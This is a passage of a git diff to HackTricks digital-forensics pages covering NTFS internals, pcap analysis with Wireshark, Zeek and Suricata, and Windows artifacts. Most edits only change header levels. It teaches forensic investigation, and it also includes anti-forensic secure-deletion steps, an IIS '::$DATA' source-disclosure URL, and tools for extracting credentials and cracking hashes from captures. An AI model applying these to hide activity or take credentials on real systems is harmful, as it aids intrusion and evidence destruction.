As it was seen before there are several places where the file is still saved after it was "deleted". This is because usually the deletion of a file from a file-system just mark it as deleted but the data isn't touched. Then, it's possible to inspect the registries of the files (like the MFT) and find the deleted files.
|
||||
|
||||
|
@ -225,7 +224,7 @@ Also, the OS usually saves a lot of information about file system changes and ba
|
|||
[file-data-carving-recovery-tools.md](file-data-carving-recovery-tools.md)
|
||||
{% endcontent-ref %}
|
||||
|
||||
### **File Carving**
|
||||
#### **File Carving**
|
||||
|
||||
**File carving** is a technique that tries to **find files in a bulk of data**. There are 3 main ways tools like this works: **Based on file types headers and footers**, based on file types **structures** and based on the **content** itself.
|
||||
|
||||
|
@ -237,7 +236,7 @@ There are several tools that you can use for file Carving indicating them the fi
|
|||
[file-data-carving-recovery-tools.md](file-data-carving-recovery-tools.md)
|
||||
{% endcontent-ref %}
|
||||
|
||||
### Data Stream **C**arving
|
||||
#### Data Stream **C**arving
|
||||
|
||||
Data Stream Carving is similar to File Carving but i**nstead of looking for complete files, it looks for interesting fragments** of information.\
|
||||
For example, instead of looking for a complete file containing logged URLs, this technique will search for URLs.
|
||||
|
@ -246,12 +245,12 @@ For example, instead of looking for a complete file containing logged URLs, this
|
|||
[file-data-carving-recovery-tools.md](file-data-carving-recovery-tools.md)
|
||||
{% endcontent-ref %}
|
||||
|
||||
### Secure Deletion
|
||||
#### Secure Deletion
|
||||
|
||||
Obviously, there are ways to **"securely" delete files and part of logs about them**. For example, it's possible to **overwrite the content** of a file with junk data several times, and then **remove** the **logs** from the **$MFT** and **$LOGFILE** about the file, and **remove the Volume Shadow Copies**.\
|
||||
You may notice that even performing that action there might be **other parts where the existence of the file is still logged**, and that's true and part of the forensics professional job is to find them.
|
||||
|
||||
## References
|
||||
### References
|
||||
|
||||
* [https://en.wikipedia.org/wiki/GUID\_Partition\_Table](https://en.wikipedia.org/wiki/GUID\_Partition\_Table)
|
||||
* [http://ntfs.com/ntfs-permissions.htm](http://ntfs.com/ntfs-permissions.htm)
|
||||
|
@ -259,7 +258,6 @@ You may notice that even performing that action there might be **other parts whe
|
|||
* [https://docs.microsoft.com/en-us/windows-server/storage/file-server/volume-shadow-copy-service](https://docs.microsoft.com/en-us/windows-server/storage/file-server/volume-shadow-copy-service)
|
||||
* **iHackLabs Certified Digital Forensics Windows**
|
||||
|
||||
|
||||
<details>
|
||||
|
||||
<summary><strong>Support HackTricks and get benefits!</strong></summary>
|
||||
|
@ -275,5 +273,3 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
|||
**Share your hacking tricks submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.**
|
||||
|
||||
</details>
|
||||
|
||||
|
||||
|
|
|
@ -1,4 +1,4 @@
|
|||
|
||||
# NTFS
|
||||
|
||||
<details>
|
||||
|
||||
|
@ -16,10 +16,9 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
|||
|
||||
</details>
|
||||
|
||||
## NTFS
|
||||
|
||||
# NTFS
|
||||
|
||||
## **NTFS**
|
||||
### **NTFS**
|
||||
|
||||
**NTFS** (**New Technology File System**) is a proprietary journaling file system developed by Microsoft.
|
||||
|
||||
|
@ -36,17 +35,17 @@ The cluster is the minimum size unit of NTFS and the size of the cluster depends
|
|||
| 16,385MB-32,768MB (32GB) | 64 | 32KB |
|
||||
| Greater than 32,768MB | 128 | 64KB |
|
||||
|
||||
### **Slack-Space**
|
||||
#### **Slack-Space**
|
||||
|
||||
As the **minimum** size unit of NTFS is a **cluster**. Each file will be occupying a number of complete clusters. Then, it's highly probable that **each file occupies more space than necessary**. These **unused** **spaces** **booked** by a file which is called **slacking** **space**. And people could take advantage of this technique to **hide** **information**.
|
||||
|
||||
![](<../../../.gitbook/assets/image (498).png>)
|
||||
|
||||
### **NTFS boot sector**
|
||||
#### **NTFS boot sector**
|
||||
|
||||
When you format an NTFS volume, the format program allocates the first 16 sectors for the $Boot metadata file. First sector, in fact, is a boot sector with a "bootstrap" code and the following 15 sectors are the boot sector's IPL (initial program loader). To increase file system reliability the very last sector an NTFS partition contains a spare copy of the boot sector.
|
||||
|
||||
### **Master File Table o $MFT**
|
||||
#### **Master File Table o $MFT**
|
||||
|
||||
The NTFS file system contains a file called the _master file table_, or MFT. There is at least **one entry in the MFT for every file on an NTFS file system** volume, including the MFT itself. All information about a file, including its **size, time and date stamps, permissions, and data content**, is stored either in MFT entries, or in space outside the MFT that is described by MFT entries.
|
||||
|
||||
|
@ -79,7 +78,7 @@ NTFS reserves the first 16 records of the table for special information:
|
|||
| Object Id file | $ObjId | 25 | Contains file object IDs. |
|
||||
| Reparse point file | $Reparse | 26 | This file contains information about files and folders on the volume include reparse point data. |
|
||||
|
||||
### Each entry of the MFT looks like the following:
|
||||
#### Each entry of the MFT looks like the following:
|
||||
|
||||
![](<../../../.gitbook/assets/image (499).png>)
|
||||
|
||||
|
@ -99,7 +98,7 @@ It's also possible to recover deleted files using FTKImager:
|
|||
|
||||
![](<../../../.gitbook/assets/image (502).png>)
|
||||
|
||||
### MFT Attributes
|
||||
#### MFT Attributes
|
||||
|
||||
Each MFT entry has several attributes as the following image indicates:
|
||||
|
||||
|
@ -153,11 +152,11 @@ Some interesting attributes:
|
|||
* [$Data](https://flatcap.org/linux-ntfs/ntfs/attributes/data.html) (among others):
|
||||
* Contains the file's data or the indication of the sectors where the data resides. In the following example the attribute data is not resident so the attribute gives information about the sectors where the data resides.
|
||||
|
||||
![](<../../../.gitbook/assets/image (507) (1) (1).png>)
|
||||
![](<../../../.gitbook/assets/image (507) (1).png>)
|
||||
|
||||
![](<../../../.gitbook/assets/image (509).png>)
|
||||
|
||||
### NTFS timestamps
|
||||
#### NTFS timestamps
|
||||
|
||||
![](<../../../.gitbook/assets/image (512).png>)
|
||||
|
||||
|
@ -166,7 +165,7 @@ This program will extract all the MFT data and present it in CSV format. It can
|
|||
|
||||
![](<../../../.gitbook/assets/image (513).png>)
|
||||
|
||||
### $LOGFILE
|
||||
#### $LOGFILE
|
||||
|
||||
The file **`$LOGFILE`** contains **logs** about the **actions** that have been **performed** **to** **files**. It also **saves** the **action** it would need to perform in case of a **redo** and the action needed to **go back** to the **previous** **state**.\
|
||||
These logs are useful for the MFT to rebuild the file system in case some kind of error happened.
|
||||
|
@ -182,7 +181,7 @@ Filtering by filenames you can see **all the actions performed against a file**:
|
|||
|
||||
![](<../../../.gitbook/assets/image (514).png>)
|
||||
|
||||
### $USNJnrl
|
||||
#### $USNJnrl
|
||||
|
||||
The file `$EXTEND/$USNJnrl/$J` is and alternate data stream of the file `$EXTEND$USNJnrl` . This artifact contains a **registry of changes produced inside the NTFS volume with more detail than `$LOGFILE`**.
|
||||
|
||||
|
@ -192,7 +191,7 @@ Filtering by the filename it's possible to see **all the actions performed again
|
|||
|
||||
![](<../../../.gitbook/assets/image (516).png>)
|
||||
|
||||
### $I30
|
||||
#### $I30
|
||||
|
||||
Every **directory** in the file system contains an **`$I30`** **attribute** that must be maintained whenever there are changes to the directory's contents. When files or folders are removed from the directory, the **`$I30`** index records are re-arranged accordingly. However, **re-arranging of the index records may leave remnants of the deleted file/folder entry within the slack space**. This can be useful in forensics analysis for identifying files that may have existed on the drive.
|
||||
|
||||
|
@ -202,13 +201,13 @@ You can get the `$I30` file of a directory from the **FTK Imager** and inspect i
|
|||
|
||||
With this data you can find **information about the file changes performed inside the folder** but note that the deletion time of a file isn't saved inside this logs. However, you can see that **last modified date** of the **`$I30` file**, and if the **last action performed** over the directory is the **deletion** of a file, the times may be the same.
|
||||
|
||||
### $Bitmap
|
||||
#### $Bitmap
|
||||
|
||||
The **`$BitMap`** is a special file within the NTFS file system. This file keeps **track of all of the used and unused clusters** on an NTFS volume. When a file takes up space on the NTFS volume the location is uses is marked out in the `$BitMap`.
|
||||
|
||||
![](<../../../.gitbook/assets/image (523).png>)
|
||||
|
||||
### ADS (Alternate Data Stream)
|
||||
#### ADS (Alternate Data Stream)
|
||||
|
||||
Alternate data streams allow files to contain more than one stream of data. Every file has at least one data stream. In Windows, this default data stream is called `:$DATA`.\
|
||||
In this [page you can see different ways to create/access/discover alternate data streams](../../../windows/basic-cmd-for-pentesters.md#alternate-data-streams-cheatsheet-ads-alternate-data-stream) from the console. In the past this cause a vulnerability in IIS as people was able to access the source code of a page by accessing the `:$DATA` stream like `http://www.alternate-data-streams.com/default.asp::$DATA`.
|
||||
|
@ -238,7 +237,6 @@ Moreover, different software may store additional information:
|
|||
| Firefox, Tor browser, Outlook2016, Thunderbird, Windows Mail, Skype | ZoneId=3 |
|
||||
| μTorrent | ZoneId=3, HostUrl=about:internet |
|
||||
|
||||
|
||||
<details>
|
||||
|
||||
<summary><strong>Support HackTricks and get benefits!</strong></summary>
|
||||
|
@ -254,5 +252,3 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
|||
**Share your hacking tricks submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.**
|
||||
|
||||
</details>
|
||||
|
||||
|
||||
|
|
|
@ -1,4 +1,4 @@
|
|||
|
||||
# Pcap Inspection
|
||||
|
||||
<details>
|
||||
|
||||
|
@ -16,24 +16,23 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
|||
|
||||
</details>
|
||||
|
||||
|
||||
# Pcap Inspection
|
||||
## Pcap Inspection
|
||||
|
||||
{% hint style="info" %}
|
||||
A note about **PCAP** vs **PCAPNG**: there are two versions of the PCAP file format; **PCAPNG is newer and not supported by all tools**. You may need to convert a file from PCAPNG to PCAP using Wireshark or another compatible tool, in order to work with it in some other tools.
|
||||
{% endhint %}
|
||||
|
||||
## Online tools for pcaps
|
||||
### Online tools for pcaps
|
||||
|
||||
* If the header of your pcap is **broken** you should try to **fix** it using: [http://f00l.de/hacking/**pcapfix.php**](http://f00l.de/hacking/pcapfix.php)
|
||||
* Extract **information** and search for **malware** inside a pcap in [**PacketTotal**](https://packettotal.com)
|
||||
* Search for **malicious activity** using [**www.virustotal.com**](https://www.virustotal.com) and [**www.hybrid-analysis.com**](https://www.hybrid-analysis.com)
|
||||
|
||||
## Extract Information
|
||||
### Extract Information
|
||||
|
||||
The following tools are useful to extract statistic, files...
|
||||
|
||||
### Wireshark
|
||||
#### Wireshark
|
||||
|
||||
{% hint style="info" %}
|
||||
**If you are going to analyze a PCAP you basically must to know how to use Wireshark**
|
||||
|
@ -45,11 +44,11 @@ You can find some Wireshark trick in:
|
|||
[wireshark-tricks.md](wireshark-tricks.md)
|
||||
{% endcontent-ref %}
|
||||
|
||||
### Xplico Framework
|
||||
#### Xplico Framework
|
||||
|
||||
[**Xplico** ](https://github.com/xplico/xplico)_(only linux)_ can **analyze** a **pcap** and extract information from it. For example, from a pcap file Xplico extracts each email (POP, IMAP, and SMTP protocols), all HTTP contents, each VoIP call (SIP), FTP, TFTP, and so on.
|
||||
|
||||
#### Install
|
||||
**Install**
|
||||
|
||||
```bash
|
||||
sudo bash -c 'echo "deb http://repo.xplico.org/ $(lsb_release -s -c) main" /etc/apt/sources.list'
|
||||
|
@ -58,7 +57,7 @@ sudo apt-get update
|
|||
sudo apt-get install xplico
|
||||
```
|
||||
|
||||
#### Run
|
||||
**Run**
|
||||
|
||||
```
|
||||
/etc/init.d/apache2 restart
|
||||
|
@ -69,19 +68,19 @@ Access to _**127.0.0.1:9876**_ with credentials _**xplico:xplico**_
|
|||
|
||||
Then create a **new case**, create a **new session** inside the case and **upload the pcap** file.
|
||||
|
||||
### NetworkMiner
|
||||
#### NetworkMiner
|
||||
|
||||
Like Xplico it is a tool to **analyze and extract objects from pcaps**. It has a free edition that you can **download** [**here**](https://www.netresec.com/?page=NetworkMiner). It works with **Windows**.\
|
||||
This tool is also useful to get **other information analysed** from the packets in order to be able to know what was happening there in a **quick** way.
|
||||
|
||||
### NetWitness Investigator
|
||||
#### NetWitness Investigator
|
||||
|
||||
You can download [**NetWitness Investigator from here**](https://www.rsa.com/en-us/contact-us/netwitness-investigator-freeware) **(It works in Windows)**.\
|
||||
This is another useful tool that **analyse the packets** and sort the information in a useful way to **know what is happening inside**.
|
||||
|
||||
![](<../../../.gitbook/assets/image (567) (1).png>)
|
||||
![](<../../../.gitbook/assets/image (567) (1) (1).png>)
|
||||
|
||||
### [BruteShark](https://github.com/odedshimon/BruteShark)
|
||||
#### [BruteShark](https://github.com/odedshimon/BruteShark)
|
||||
|
||||
* Extracting and encoding usernames and passwords (HTTP, FTP, Telnet, IMAP, SMTP...)
|
||||
* Extract authentication hashes and crack them using Hashcat (Kerberos, NTLM, CRAM-MD5, HTTP-Digest...)
|
||||
|
@ -90,13 +89,13 @@ This is another useful tool that **analyse the packets** and sort the informatio
|
|||
* Reconstruct all TCP & UDP Sessions
|
||||
* File Carving
|
||||
|
||||
### Capinfos
|
||||
#### Capinfos
|
||||
|
||||
```
|
||||
capinfos capture.pcap
|
||||
```
|
||||
|
||||
### Ngrep
|
||||
#### Ngrep
|
||||
|
||||
If you are **looking** for **something** inside the pcap you can use **ngrep**. And example using the main filters:
|
||||
|
||||
|
@ -104,7 +103,7 @@ If you are **looking** for **something** inside the pcap you can use **ngrep**.
|
|||
ngrep -I packets.pcap "^GET" "port 80 and tcp and host 192.168 and dst host 192.168 and src host 192.168"
|
||||
```
|
||||
|
||||
### Carving
|
||||
#### Carving
|
||||
|
||||
Using common carving techniques can be useful to extract files and information from the pcap:
|
||||
|
||||
|
@ -112,15 +111,15 @@ Using common carving techniques can be useful to extract files and information f
|
|||
[file-data-carving-recovery-tools.md](../partitions-file-systems-carving/file-data-carving-recovery-tools.md)
|
||||
{% endcontent-ref %}
|
||||
|
||||
### Capturing credentials
|
||||
#### Capturing credentials
|
||||
|
||||
You can us tools like [https://github.com/lgandx/PCredz](https://github.com/lgandx/PCredz) to parse credentials from a pcap or a live interface.
|
||||
|
||||
## Check Exploits/Malware
|
||||
### Check Exploits/Malware
|
||||
|
||||
### Suricata
|
||||
#### Suricata
|
||||
|
||||
#### Install and setup
|
||||
**Install and setup**
|
||||
|
||||
```
|
||||
apt-get install suricata
|
||||
|
@ -129,13 +128,13 @@ echo "url = http://rules.emergingthreats.net/open/suricata/emerging.rules.tar.gz
|
|||
oinkmaster -C /etc/oinkmaster.conf -o /etc/suricata/rules
|
||||
```
|
||||
|
||||
#### Check pcap
|
||||
**Check pcap**
|
||||
|
||||
```
|
||||
suricata -r packets.pcap -c /etc/suricata/suricata.yaml -k none -v -l log
|
||||
```
|
||||
|
||||
### YaraPcap
|
||||
#### YaraPcap
|
||||
|
||||
[**YaraPCAP**](https://github.com/kevthehermit/YaraPcap) is a tool that
|
||||
|
||||
|
@ -145,7 +144,7 @@ suricata -r packets.pcap -c /etc/suricata/suricata.yaml -k none -v -l log
|
|||
* writes a report.txt
|
||||
* optionally saves matching files to a Dir
|
||||
|
||||
### Malware Analysis
|
||||
#### Malware Analysis
|
||||
|
||||
Check if you can find any fingerprint of a known malware:
|
||||
|
||||
|
@ -153,13 +152,13 @@ Check if you can find any fingerprint of a known malware:
|
|||
[malware-analysis.md](../malware-analysis.md)
|
||||
{% endcontent-ref %}
|
||||
|
||||
## Zeek
|
||||
### Zeek
|
||||
|
||||
> Zeek is a passive, open-source network traffic analyzer. Many operators use Zeek as a network security monitor (NSM) to support investigations of suspicious or malicious activity. Zeek also supports a wide range of traffic analysis tasks beyond the security domain, including performance measurement and troubleshooting.
|
||||
|
||||
Basically, logs created by `zeek` aren't **pcaps**. Therefore you will need to use **other tools** to analyse the logs where the **information** about the pcaps are.
|
||||
|
||||
### Connections Info
|
||||
#### Connections Info
|
||||
|
||||
```bash
|
||||
#Get info about longest connections (add "grep udp" to see only udp traffic)
|
||||
|
@ -211,7 +210,7 @@ Score,Source IP,Destination IP,Connections,Avg Bytes,Intvl Range,Size Range,Top
|
|||
0.838,10.55.200.10,205.251.194.64,210,69,29398,4,300,70,109,205,0,0,0,0
|
||||
```
|
||||
|
||||
### DNS info
|
||||
#### DNS info
|
||||
|
||||
```bash
|
||||
#Get info about each DNS request performed
|
||||
|
@ -228,10 +227,9 @@ cat dns.log | zeek-cut qtype_name | sort | uniq -c | sort -nr
|
|||
|
||||
#See top DNS domain requested with rita
|
||||
rita show-exploded-dns -H --limit 10 zeek_logs
|
||||
|
||||
```
|
||||
|
||||
## Other pcap analysis tricks
|
||||
### Other pcap analysis tricks
|
||||
|
||||
{% content-ref url="dnscat-exfiltration.md" %}
|
||||
[dnscat-exfiltration.md](dnscat-exfiltration.md)
|
||||
|
@ -245,7 +243,6 @@ rita show-exploded-dns -H --limit 10 zeek_logs
|
|||
[usb-keystrokes.md](usb-keystrokes.md)
|
||||
{% endcontent-ref %}
|
||||
|
||||
|
||||
<details>
|
||||
|
||||
<summary><strong>Support HackTricks and get benefits!</strong></summary>
|
||||
|
@ -261,5 +258,3 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
|||
**Share your hacking tricks submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.**
|
||||
|
||||
</details>
|
||||
|
||||
|
||||
|
|
|
@ -1,4 +1,4 @@
|
|||
|
||||
# Wireshark tricks
|
||||
|
||||
<details>
|
||||
|
||||
|
@ -16,12 +16,11 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
|||
|
||||
</details>
|
||||
|
||||
## Wireshark tricks
|
||||
|
||||
# Wireshark tricks
|
||||
### Improve your Wireshark skills
|
||||
|
||||
## Improve your Wireshark skills
|
||||
|
||||
### Tutorials
|
||||
#### Tutorials
|
||||
|
||||
The following tutorials are amazing to learn some cool basic tricks:
|
||||
|
||||
|
@ -30,52 +29,52 @@ The following tutorials are amazing to learn some cool basic tricks:
|
|||
* [https://unit42.paloaltonetworks.com/using-wireshark-identifying-hosts-and-users/](https://unit42.paloaltonetworks.com/using-wireshark-identifying-hosts-and-users/)
|
||||
* [https://unit42.paloaltonetworks.com/using-wireshark-exporting-objects-from-a-pcap/](https://unit42.paloaltonetworks.com/using-wireshark-exporting-objects-from-a-pcap/)
|
||||
|
||||
### Analysed Information
|
||||
#### Analysed Information
|
||||
|
||||
#### Expert Information
|
||||
**Expert Information**
|
||||
|
||||
Clicking on _**Analyze** --> **Expert Information**_ you will have an **overview** of what is happening in the packets **analised**:
|
||||
|
||||
![](<../../../.gitbook/assets/image (570).png>)
|
||||
|
||||
#### Resolved Addresses
|
||||
**Resolved Addresses**
|
||||
|
||||
Under _**Statistics --> Resolved Addresses**_ you can find several **information** that was "**resolved**" by wireshark like port/transport to protocol, mac to manufacturer...\
|
||||
This is interesting to know what is implicated in the communication.
|
||||
|
||||
![](<../../../.gitbook/assets/image (571).png>)
|
||||
|
||||
#### Protocol Hierarchy
|
||||
**Protocol Hierarchy**
|
||||
|
||||
Under _**Statistics --> Protocol Hierarchy**_ you can find the **protocols** **involved** in the communication and data about them.
|
||||
|
||||
![](<../../../.gitbook/assets/image (572).png>)
|
||||
|
||||
#### Conversations
|
||||
**Conversations**
|
||||
|
||||
Under _**Statistics --> Conversations**_ you can find a **summary of the conversations** in the communication and data about them.
|
||||
|
||||
![](<../../../.gitbook/assets/image (573).png>)
|
||||
|
||||
#### **Endpoints**
|
||||
**Endpoints**
|
||||
|
||||
Under _**Statistics --> Endpoints**_ you can find a **summary of the endpoints** in the communication and data about each of them.
|
||||
|
||||
![](<../../../.gitbook/assets/image (575).png>)
|
||||
|
||||
#### DNS info
|
||||
**DNS info**
|
||||
|
||||
Under _**Statistics --> DNS**_ you can find statistics about the DNS request captured.
|
||||
|
||||
![](<../../../.gitbook/assets/image (577).png>)
|
||||
|
||||
#### I/O Graph
|
||||
**I/O Graph**
|
||||
|
||||
Under _**Statistics --> I/O Graph**_ you can find a **graph of the communication.**
|
||||
|
||||
![](<../../../.gitbook/assets/image (574).png>)
|
||||
|
||||
### Filters
|
||||
#### Filters
|
||||
|
||||
Here you can find wireshark filter depending on the protocol: [https://www.wireshark.org/docs/dfref/](https://www.wireshark.org/docs/dfref/)\
|
||||
Other interesting filters:
|
||||
|
@ -87,14 +86,14 @@ Other interesting filters:
|
|||
* `(http.request or ssl.handshake.type == 1 or tcp.flags eq 0x0002 or dns) and !(udp.port eq 1900)`
|
||||
* HTTP and initial HTTPS traffic + TCP SYN + DNS requests
|
||||
|
||||
### Search
|
||||
#### Search
|
||||
|
||||
If you want to **search** for **content** inside the **packets** of the sessions press _CTRL+f_\
|
||||
\_\_You can add new layers to the main information bar _(No., Time, Source...)_ pressing _right bottom_ and _Edit Column_
|
||||
|
||||
Practice: [https://www.malware-traffic-analysis.net/](https://www.malware-traffic-analysis.net)
|
||||
|
||||
## Identifying Domains
|
||||
### Identifying Domains
|
||||
|
||||
You can add a column that show the Host HTTP header:
|
||||
|
||||
|
@ -102,23 +101,23 @@ You can add a column that show the Host HTTP header:
|
|||
|
||||
And a column that add the Server name from an initiating HTTPS connection (**ssl.handshake.type == 1**):
|
||||
|
||||
![](<../../../.gitbook/assets/image (408).png>)
|
||||
![](<../../../.gitbook/assets/image (408) (1).png>)
|
||||
|
||||
## Identifying local hostnames
|
||||
### Identifying local hostnames
|
||||
|
||||
### From DHCP
|
||||
#### From DHCP
|
||||
|
||||
In current Wireshark instead of `bootp` you need to search for `DHCP`
|
||||
|
||||
![](<../../../.gitbook/assets/image (404).png>)
|
||||
|
||||
### From NBNS
|
||||
#### From NBNS
|
||||
|
||||
![](<../../../.gitbook/assets/image (405).png>)
|
||||
|
||||
## Decrypting TLS
|
||||
### Decrypting TLS
|
||||
|
||||
### Decrypting https traffic with server private key
|
||||
#### Decrypting https traffic with server private key
|
||||
|
||||
_edit>preference>protocol>ssl>_
|
||||
|
||||
|
@ -126,7 +125,7 @@ _edit>preference>protocol>ssl>_
|
|||
|
||||
Press _Edit_ and add all the data of the server and the private key (_IP, Port, Protocol, Key file and password_)
|
||||
|
||||
### Decrypting https traffic with symmetric session keys
|
||||
#### Decrypting https traffic with symmetric session keys
|
||||
|
||||
It turns out that Firefox and Chrome both support logging the symmetric session key used to encrypt TLS traffic to a file. You can then point Wireshark at said file and presto! decrypted TLS traffic. More in: [https://redflagsecurity.net/2019/03/10/decrypting-tls-wireshark/](https://redflagsecurity.net/2019/03/10/decrypting-tls-wireshark/)\
|
||||
To detect this search inside the environment for to variable `SSLKEYLOGFILE`
|
||||
|
@ -139,7 +138,7 @@ To import this in wireshark go to _edit>preference>protocol>ssl>_ and import it
|
|||
|
||||
![](<../../../.gitbook/assets/image (100).png>)
|
||||
|
||||
## ADB communication
|
||||
### ADB communication
|
||||
|
||||
Extract an APK from an ADB communication where the APK was sent:
|
||||
|
||||
|
@ -170,7 +169,6 @@ f.write(all_bytes)
|
|||
f.close()
|
||||
```
|
||||
|
||||
|
||||
<details>
|
||||
|
||||
<summary><strong>Support HackTricks and get benefits!</strong></summary>
|
||||
|
@ -186,5 +184,3 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
|||
**Share your hacking tricks submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.**
|
||||
|
||||
</details>
|
||||
|
||||
|
||||
|
|
|
@ -1,4 +1,4 @@
|
|||
|
||||
# Windows Artifacts
|
||||
|
||||
<details>
|
||||
|
||||
|
@ -16,30 +16,29 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
|||
|
||||
</details>
|
||||
|
||||
## Windows Artifacts
|
||||
|
||||
# Windows Artifacts
|
||||
### Generic Windows Artifacts
|
||||
|
||||
## Generic Windows Artifacts
|
||||
|
||||
### Windows 10 Notifications
|
||||
#### Windows 10 Notifications
|
||||
|
||||
In the path `\Users\<username>\AppData\Local\Microsoft\Windows\Notifications` you can find the database `appdb.dat` (before Windows anniversary) or `wpndatabase.db` (after Windows Anniversary).
|
||||
|
||||
Inside this SQLite database you can find the `Notification` table with all the notifications (in xml format) that may contain interesting data.
|
||||
|
||||
### Timeline
|
||||
#### Timeline
|
||||
|
||||
Timeline is a Windows characteristic that provides **chronological history** of web pages visited, edited documents, executed applications...\
|
||||
The database resides in the path `\Users\<username>\AppData\Local\ConnectedDevicesPlatform\<id>\ActivitiesCache.db`\
|
||||
This database can be open with a SQLite tool or with the tool [**WxTCmd**](https://github.com/EricZimmerman/WxTCmd) **which generates 2 files that can be opened with the tool** [**TimeLine Explorer**](https://ericzimmerman.github.io/#!index.md).
|
||||
|
||||
### ADS/Alternate Data Streams
|
||||
#### ADS/Alternate Data Streams
|
||||
|
||||
Files downloaded may contain the **ADS Zone.Identifier** indicating **how** was **downloaded** (from the intranet, Internet...) and some software (like browser) usually put even **more** **information** like the **URL** from where the file was downloaded.
|
||||
|
||||
## **File Backups**
|
||||
### **File Backups**
|
||||
|
||||
### Recycle Bin
|
||||
#### Recycle Bin
|
||||
|
||||
In Vista/Win7/Win8/Win10 the **Reciclye Bin** can be found in the folder **`$Recycle.bin`** in the root of the drive (`C:\$Reciycle.bin`).\
|
||||
When a file is deleted in this folder are created 2 files:
|
||||
|
@ -55,9 +54,9 @@ Having these files you can sue the tool [**Rifiuti**](https://github.com/abelche
|
|||
.\rifiuti-vista.exe C:\Users\student\Desktop\Recycle
|
||||
```
|
||||
|
||||
![](<../../../.gitbook/assets/image (495) (1) (1) (1).png>)
|
||||
![](<../../../.gitbook/assets/image (495) (1) (1).png>)
|
||||
|
||||
### Volume Shadow Copies
|
||||
#### Volume Shadow Copies
|
||||
|
||||
Shadow Copy is a technology included in Microsoft Windows that can create **backup copies** or snapshots of computer files or volumes, even when they are in use.\
|
||||
These backups are usually located in the `\System Volume Information` from the roof of the file system and the name is composed by **UIDs** as in the following image:
|
||||
|
@ -74,15 +73,15 @@ The registry entry `HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\BackupRe
|
|||
|
||||
The registry `HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\VSS` also contains configuration information about the `Volume Shadow Copies`.
|
||||
|
||||
### Office AutoSaved Files
|
||||
#### Office AutoSaved Files
|
||||
|
||||
You can find the office autosaved files in : `C:\Usuarios\\AppData\Roaming\Microsoft{Excel|Word|Powerpoint}\`
|
||||
|
||||
## Shell Items
|
||||
### Shell Items
|
||||
|
||||
A shell item is an item that contains information about how to access another file.
|
||||
|
||||
### Recent Documents (LNK)
|
||||
#### Recent Documents (LNK)
|
||||
|
||||
Windows **automatically** **creates** these **shortcuts** when the user **open, uses or creates a file** in:
|
||||
|
||||
|
@ -108,7 +107,7 @@ LECmd.exe -d C:\Users\student\Desktop\LNKs --csv C:\Users\student\Desktop\LNKs
|
|||
|
||||
In this case the information is going to be saved inside a CSV file.
|
||||
|
||||
### Jumplists
|
||||
#### Jumplists
|
||||
|
||||
These are the recent files that are indicated per application. It's the list of **recent files used by an application** that you can access on each application.
|
||||
|
||||
|
@ -127,11 +126,11 @@ You can inspect the jumplists using [**JumplistExplorer**](https://ericzimmerman
|
|||
|
||||
(_Note that the timestamps provided by JumplistExplorer are related to the jumplist file itself_)
|
||||
|
||||
### Shellbags
|
||||
#### Shellbags
|
||||
|
||||
[**Follow this link to learn what are the shellbags.**](interesting-windows-registry-keys.md#shellbags)
|
||||
|
||||
## Use of Windows USBs
|
||||
### Use of Windows USBs
|
||||
|
||||
It's possible to identify that a USB device was used thanks to the creation of:
|
||||
|
||||
|
@ -145,23 +144,23 @@ Note that some LNK file instead of pointing to the original path, points to the
|
|||
|
||||
The files in the folder WPDNSE are a copy of the original ones, then won't survive a restart of the PC and the GUID is taken from a shellbag.
|
||||
|
||||
### Registry Information
|
||||
#### Registry Information
|
||||
|
||||
[Check this page to learn](interesting-windows-registry-keys.md#usb-information) which registry keys contains interesting information about USB connected devices.
|
||||
|
||||
### setupapi
|
||||
#### setupapi
|
||||
|
||||
Check the file `C:\Windows\inf\setupapi.dev.log` to get the timestamps about when the USB connection was produced (search for `Section start`).
|
||||
|
||||
![](<../../../.gitbook/assets/image (477) (2) (2) (2) (2) (2) (2) (2) (3) (1) (1) (1) (3).png>)
|
||||
![](<../../../.gitbook/assets/image (477) (2) (2) (2) (2) (2) (2) (2) (3) (1) (1) (1) (1) (1) (1) (4).png>)
|
||||
|
||||
### USB Detective
|
||||
#### USB Detective
|
||||
|
||||
[**USBDetective**](https://usbdetective.com) can be used to obtain information about the USB devices that have been connected to an image.
|
||||
|
||||
![](<../../../.gitbook/assets/image (483).png>)
|
||||
|
||||
### Plug and Play Cleanup
|
||||
#### Plug and Play Cleanup
|
||||
|
||||
The 'Plug and Play Cleanup' scheduled task is responsible for **clearing** legacy versions of drivers. It would appear (based upon reports online) that it also picks up **drivers which have not been used in 30 days**, despite its description stating that "the most current version of each driver package will be kept". As such, **removable devices which have not been connected for 30 days may have their drivers removed**.\
|
||||
The scheduled task itself is located at ‘C:\Windows\System32\Tasks\Microsoft\Windows\Plug and Play\Plug and Play Cleanup’, and its content is displayed below:
|
||||
|
@ -171,7 +170,7 @@ The scheduled task itself is located at ‘C:\Windows\System32\Tasks\Microsoft\W
|
|||
The task references 'pnpclean.dll' which is responsible for performing the cleanup activity additionally we see that the ‘UseUnifiedSchedulingEngine’ field is set to ‘TRUE’ which specifies that the generic task scheduling engine is used to manage the task. The ‘Period’ and ‘Deadline’ values of 'P1M' and 'P2M' within ‘MaintenanceSettings’ instruct Task Scheduler to execute the task once every month during regular Automatic maintenance and if it fails for 2 consecutive months, to start attempting the task during.\
|
||||
**This section was copied from** [**here**](https://blog.1234n6.com/2018/07/windows-plug-and-play-cleanup.html)**.**
|
||||
|
||||
## Emails
|
||||
### Emails
|
||||
|
||||
The emails contains **2 interesting parts: The headers and the content** of the email. In the **headers** you can find information like:
|
||||
|
||||
|
